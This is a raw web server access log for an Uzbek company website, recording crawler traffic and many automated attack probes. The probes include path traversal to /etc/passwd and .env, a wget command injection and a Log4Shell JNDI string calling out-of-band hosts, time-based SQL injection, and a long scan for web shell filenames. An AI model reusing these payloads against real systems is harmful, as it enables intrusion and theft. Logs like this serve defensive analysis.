34.10.180.98 - - [25/Aug/2026:00:17:21 +0500] "GET /uz/component/search/?Itemid=17241&catid=6193&format=opensearch&id=9886 HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
85.208.96.197 - - [25/Aug/2026:00:17:56 +0500] "GET /uz/?q=user%2Flogin&start=54 HTTP/1.1" 200 63415 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.206 - - [25/Aug/2026:00:18:33 +0500] "GET /uz/?start=66 HTTP/1.1" 200 62326 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.14 - - [25/Aug/2026:00:19:01 +0500] "GET /uz/about-org-uzb/strategy-uzb/2-uncategorised/9729-ensuring-an-open-budget-uz HTTP/1.1" 200 33460 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.183 - - [25/Aug/2026:00:19:51 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.10.180.98 - - [25/Aug/2026:00:20:03 +0500] "GET /uz/?location=search&start=36 HTTP/1.1" 200 62000 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
52.202.233.37 - - [25/Aug/2026:00:20:16 +0500] "GET /uz/?format=feed&type=rss&yandex-source=touch-maps HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.18 - - [25/Aug/2026:00:20:21 +0500] "GET /uz/?file=..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2F.env&start=30 HTTP/1.1" 200 61274 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.30.223.149 - - [25/Aug/2026:00:21:02 +0500] "GET /docs/2024/audit_nsbu-2023.pdf HTTP/1.1" 200 8862671 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [25/Aug/2026:00:21:15 +0500] "GET /?sl=../../../../../../../etc/passwd%EF%BF%BD&start=42 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.94.155.73 - - [25/Aug/2026:00:21:23 +0500] "GET /wp-includes/css/buttons.css HTTP/1.1" 508 288 "-" "Go-http-client/1.1"
23.94.155.73 - - [25/Aug/2026:00:21:23 +0500] "GET /media/system/js/core.js HTTP/1.1" 200 8808 "-" "Go-http-client/1.1"
3.209.174.110 - - [25/Aug/2026:00:21:37 +0500] "GET /uz/?amp HTTP/1.1" 200 61407 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
129.153.68.182 - - [25/Aug/2026:00:22:04 +0500] "GET /ru/about-org-rus/for-investors-rus HTTP/1.1" 508 288 "-" "Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
185.191.171.1 - - [25/Aug/2026:00:21:59 +0500] "GET /uz/?amp%3Bstart=18&module=users%2Flogin&start=48 HTTP/1.1" 200 63470 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
157.55.39.12 - - [25/Aug/2026:00:22:31 +0500] "GET /docs/tenders/2022/dog-08-2022.xlsx HTTP/1.1" 200 20357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.171.68.95 - - [25/Aug/2026:00:22:41 +0500] "GET /?format=feed&type=rss&x=%7Bsource%7DTRIPROBE%7B/source%7D HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.6 - - [25/Aug/2026:00:22:38 +0500] "GET /uz/officially-uzb/presentations-uz/2-uncategorised/9727-ensuring-openness-uz?layout=edit HTTP/1.1" 200 33495 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
220.181.108.111 - - [25/Aug/2026:00:24:19 +0500] "GET /?location=search&start=72 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
34.10.180.98 - - [25/Aug/2026:00:24:24 +0500] "GET /uz/officially-uzb/tender-uzb/9546-tender-audit-2019-uz HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
111.225.214.139 - - [25/Aug/2026:00:24:20 +0500] "GET /?location=search&start=72 HTTP/1.1" 200 56648 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
34.171.68.95 - - [25/Aug/2026:00:24:24 +0500] "GET /uz/?author=17&start=30 HTTP/1.1" 200 61359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
116.179.33.11 - - [25/Aug/2026:00:24:41 +0500] "GET /templates/yoo_master2/warp/vendor/uikit/fonts/fontawesome-webfont.woff2 HTTP/1.1" 200 71896 "http://uzbekgidroenergoqurilish.uz/templates/yoo_master2/css/theme.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
116.179.33.206 - - [25/Aug/2026:00:24:41 +0500] "GET /images/news/gki3.jpg HTTP/1.1" 200 2882 "http://uzbekgidroenergoqurilish.uz/?location=search&start=72" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
116.179.33.84 - - [25/Aug/2026:00:24:41 +0500] "GET /plugins/system/jcemediabox/themes/standard/tooltip.html HTTP/1.1" 200 958 "http://uzbekgidroenergoqurilish.uz/?location=search&start=72" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
116.179.33.209 - - [25/Aug/2026:00:24:41 +0500] "GET /plugins/system/jcemediabox/themes/standard/popup.html HTTP/1.1" 200 1802 "http://uzbekgidroenergoqurilish.uz/?location=search&start=72" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36"
18.207.79.144 - - [25/Aug/2026:00:24:32 +0500] "GET /uz/?doact=yyy18&format=feed&type=rss HTTP/1.1" 200 8114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
34.56.53.225 - - [25/Aug/2026:00:25:55 +0500] "GET /uz/component/search/?Itemid=17034&catid=2&format=opensearch&id=9729 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.171.68.95 - - [25/Aug/2026:00:26:39 +0500] "GET /uz/officially-uzb/tender-uzb/2-uncategorised?start=12 HTTP/1.1" 200 33139 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
43.134.100.175 - - [25/Aug/2026:00:27:20 +0500] "GET /stockholders-rus/information-rus HTTP/1.1" 508 288 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
207.46.13.17 - - [25/Aug/2026:00:27:35 +0500] "GET /?sl=../../../../../../../etc/passwd%EF%BF%BD&start=30 HTTP/1.1" 200 63726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.42.229.145 - - [25/Aug/2026:00:28:36 +0500] "GET /component/search/?Itemid=16982&catid=2&format=opensearch&id=9707 HTTP/1.1" 200 731 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
34.10.180.98 - - [25/Aug/2026:00:28:58 +0500] "GET /uz/stockholders-uzb/dividends-uzb/2-uncategorised/9731-anti-corruption-uz HTTP/1.1" 200 33463 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.191.171.14 - - [25/Aug/2026:00:29:17 +0500] "GET /uz/officially-uzb/purchasing-commission-documentation-uzb/6193-fixed-assets/9772-dog-xarid-01-2023-xlsx HTTP/1.1" 200 32281 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.9 - - [25/Aug/2026:00:29:33 +0500] "GET /uz/?plot=%3Bwget%20http%3A%2F%2Fce4phisendqrc05v0m7gm5qbfzypi9aij.oast.me HTTP/1.1" 200 62043 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [25/Aug/2026:00:31:06 +0500] "GET /uz/about-org-uzb/objects-uzb/6193-fixed-assets/9886-reestr-xarid-6-2024-xlsx HTTP/1.1" 200 32202 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.61.96.6 - - [25/Aug/2026:00:31:12 +0500] "GET /uz/component/search/?Itemid=17070&catid=2&format=opensearch&id=9728 HTTP/1.1" 200 718 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:31:21 +0500] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:26 +0500] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:32 +0500] "GET /011i.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:36 +0500] "GET /667.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:41 +0500] "GET /GA13.php HTTP/1.1" 404 1234 "-" "-"
185.191.171.7 - - [25/Aug/2026:00:31:40 +0500] "GET /?rest_route=%2Fwp%2Fv2%2Fusers%2F&start=72 HTTP/1.1" 200 56540 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.104.50.220 - - [25/Aug/2026:00:31:45 +0500] "GET /jok3r.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:49 +0500] "GET /zolando.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:53 +0500] "GET /2x.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:31:58 +0500] "GET /f22.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:03 +0500] "GET /file-manager-advanced.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:10 +0500] "GET /csa.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:16 +0500] "GET /jlex.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:22 +0500] "GET /gk.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:26 +0500] "GET /sta.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:30 +0500] "GET /ejrofgj.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:33 +0500] "GET /jwrlvcp.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:36 +0500] "GET /ykdyxlo.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:42 +0500] "GET /ykewuql.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:46 +0500] "GET /sukce.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:52 +0500] "GET /xty.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:55 +0500] "GET /xwpg.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:32:58 +0500] "GET /wp-mjfb.php HTTP/1.1" 404 1234 "-" "-"
85.208.96.203 - - [25/Aug/2026:00:32:57 +0500] "GET /?start=36&x=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-744%7D%24%7B%3A-364%7D.%24%7BhostName%7D.uri.d5393qd2ent3c0b7hdc0u3ktdnw4155kc.oast.fun%2Fa HTTP/1.1" 200 63438 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.104.50.220 - - [25/Aug/2026:00:33:01 +0500] "GET /wp-bxroot.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:05 +0500] "GET /ola.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:08 +0500] "GET /5ed04.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:11 +0500] "GET /sue.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:19 +0500] "GET /ioa.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:19 +0500] "GET /sww.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:19 +0500] "GET /xx.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:19 +0500] "GET /mcs.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:29 +0500] "GET /2.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:37 +0500] "GET /wpconf.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:37 +0500] "GET /waso.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:44 +0500] "GET /wp-admin/css/sOTYbUf.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:52 +0500] "GET /t3.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:59 +0500] "GET /file2.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:33:59 +0500] "GET /hi.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:00 +0500] "GET /nhd.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:00 +0500] "GET /sol.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:00 +0500] "GET /hah.php HTTP/1.1" 508 288 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:00 +0500] "GET /msg.php HTTP/1.1" 404 1234 "-" "-"
34.10.180.98 - - [25/Aug/2026:00:33:58 +0500] "GET /uz/about-org-uzb/news-uzb/2-uncategorised/9731-anti-corruption-uz HTTP/1.1" 200 33296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:34:09 +0500] "GET /yee.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:16 +0500] "GET /ssk.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:25 +0500] "GET /koj.php HTTP/1.1" 508 288 "-" "-"
34.10.180.98 - - [25/Aug/2026:00:34:27 +0500] "GET /uz/component/search/?Itemid=17031&catid=2&format=opensearch&id=9730 HTTP/1.1" 200 733 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:34:25 +0500] "GET /202d9.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:34:35 +0500] "GET /sst.php HTTP/1.1" 404 1234 "-" "-"
85.208.96.198 - - [25/Aug/2026:00:34:33 +0500] "GET /?p=1165 HTTP/1.1" 200 62953 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
20.104.50.220 - - [25/Aug/2026:00:34:42 +0500] "GET /nng.php HTTP/1.1" 404 1234 "-" "-"
216.73.216.183 - - [25/Aug/2026:00:34:38 +0500] "GET /uz/stockholders-uzb/invest-uzb/2-uncategorised/9731-ensuring-openness-uz?layout=edit HTTP/1.1" 200 33272 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.10.180.98 - - [25/Aug/2026:00:34:40 +0500] "GET /uz/stockholders-uzb/affil-uzb/9822-affirir-31-12-2022-uz HTTP/1.1" 200 32373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:34:51 +0500] "GET /pow.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:35:00 +0500] "GET /3f26d.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:35:07 +0500] "GET /kj.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:35:14 +0500] "GET /output.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:35:22 +0500] "GET /wtu.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:35:31 +0500] "GET /blo.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:35:47 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:35:47 +0500] "GET /robots.txt HTTP/1.1" 200 865 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:35:39 +0500] "GET /wwo.php HTTP/1.1" 404 1234 "-" "-"
34.171.68.95 - - [25/Aug/2026:00:35:49 +0500] "GET /uz/component/search/?Itemid=17024&catid=2&format=opensearch&id=9306 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:35:48 +0500] "GET /per.php HTTP/1.1" 404 1234 "-" "-"
216.73.216.183 - - [25/Aug/2026:00:35:57 +0500] "GET /uz/stockholders-uzb/invest-uzb/2-uncategorised/9730-ensuring-openness-uz?layout=edit HTTP/1.1" 508 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
34.123.149.87 - - [25/Aug/2026:00:35:57 +0500] "GET /uz/component/search/?Itemid=17023&catid=6178&format=opensearch&id=9586 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
216.73.216.183 - - [25/Aug/2026:00:35:46 +0500] "GET /uz/stockholders-uzb/invest-uzb/2-uncategorised/9728-ensuring-openness-uz HTTP/1.1" 200 32813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.75.119.229 - - [25/Aug/2026:00:35:49 +0500] "GET /?function=call_user_func_array HTTP/1.1" 200 63184 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:35:49 +0500] "GET /?function=call_user_func_array HTTP/1.1" 200 63184 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:36:02 +0500] "GET /?function=call_user_func_array&format=feed&type=atom HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:36:04 +0500] "GET /?function=call_user_func_array&format=feed&type=rss HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:35:55 +0500] "GET /5ef60.php HTTP/1.1" 404 1234 "-" "-"
136.119.35.120 - - [25/Aug/2026:00:35:52 +0500] "GET /uz/?controller=CommentGrade&fc=module&id_products%5B0%5D=1+AND+(SELECT+3875+FROM+(SELECT(SLEEP(8)))xoOt)&module=productcomments&start=66 HTTP/1.1" 200 64146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
51.75.119.229 - - [25/Aug/2026:00:36:01 +0500] "GET /?function=call_user_func_array&format=feed&type=atom HTTP/1.1" 200 11287 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:36:04 +0500] "GET /pages.php HTTP/1.1" 404 1234 "-" "-"
34.10.180.98 - - [25/Aug/2026:00:36:05 +0500] "GET /uz/?author=17&start=60 HTTP/1.1" 200 62883 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
51.75.119.229 - - [25/Aug/2026:00:36:06 +0500] "GET /?function=call_user_func_array&start=18 HTTP/1.1" 200 63652 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:36:11 +0500] "GET /?function=call_user_func_array&format=feed&type=rss HTTP/1.1" 200 7513 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
34.57.162.91 - - [25/Aug/2026:00:36:09 +0500] "GET /uz/?start=66&template=accessibility' HTTP/1.1" 200 28398 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:36:12 +0500] "GET /lock.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:36:20 +0500] "GET /lufix.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:36:20 +0500] "GET /?function=call_user_func_array&start=18 HTTP/1.1" 200 63652 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:36:19 +0500] "GET /?function=call_user_func_array&start=24 HTTP/1.1" 200 62706 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:36:26 +0500] "GET /sxo.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:36:30 +0500] "GET /?function=call_user_func_array&start=24 HTTP/1.1" 200 62706 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:36:32 +0500] "GET /elp.php HTTP/1.1" 404 1234 "-" "-"
34.123.149.87 - - [25/Aug/2026:00:36:41 +0500] "GET /?instawp-database-manager=/../../.././migrate/templates/debug/db-table&start=6&table_name=wp_users--+- HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
51.75.119.229 - - [25/Aug/2026:00:36:33 +0500] "GET /?function=call_user_func_array&start=30 HTTP/1.1" 200 63640 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.191.171.11 - - [25/Aug/2026:00:36:35 +0500] "GET /uz/?start=60&yandex-source=desktop-maps HTTP/1.1" 200 62934 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.57.162.91 - - [25/Aug/2026:00:36:38 +0500] "GET /?format=feed&type=rss&x=%7Bsource%7DTRIPROBE%7B/source%7D HTTP/1.1" 200 7511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.104.50.220 - - [25/Aug/2026:00:36:40 +0500] "GET /Njima.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:36:40 +0500] "GET /?function=call_user_func_array&start=30 HTTP/1.1" 200 63640 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:36:43 +0500] "GET /?function=call_user_func_array&start=42 HTTP/1.1" 200 65575 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:36:47 +0500] "GET /baxa1.phP8 HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:36:51 +0500] "GET /?function=call_user_func_array&start=42 HTTP/1.1" 200 65575 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:36:54 +0500] "GET /x.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:36:55 +0500] "GET /?function=call_user_func_array&start=48 HTTP/1.1" 200 64369 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:37:06 +0500] "GET /?function=call_user_func_array&start=54 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:37:07 +0500] "GET /?function=call_user_func_array&start=66 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:37:00 +0500] "GET /user.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:37:02 +0500] "GET /?function=call_user_func_array&start=48 HTTP/1.1" 200 64442 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.75.119.229 - - [25/Aug/2026:00:37:15 +0500] "GET /?function=call_user_func_array&start=54 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:37:07 +0500] "GET /themes.php HTTP/1.1" 404 1234 "-" "-"
51.75.119.229 - - [25/Aug/2026:00:37:16 +0500] "GET /?function=call_user_func_array&start=66 HTTP/1.1" 508 288 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
20.104.50.220 - - [25/Aug/2026:00:37:16 +0500] "GET /buy.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:37:23 +0500] "GET /BIBIL.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:37:31 +0500] "GET /xleet.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:37:38 +0500] "GET /dropdown.php HTTP/1.1" 404 1234 "-" "-"
20.104.50.220 - - [25/Aug/2026:00:37:45 +0500] "GET /h.php HTTP/1.1" 404 1234 "-" "-"
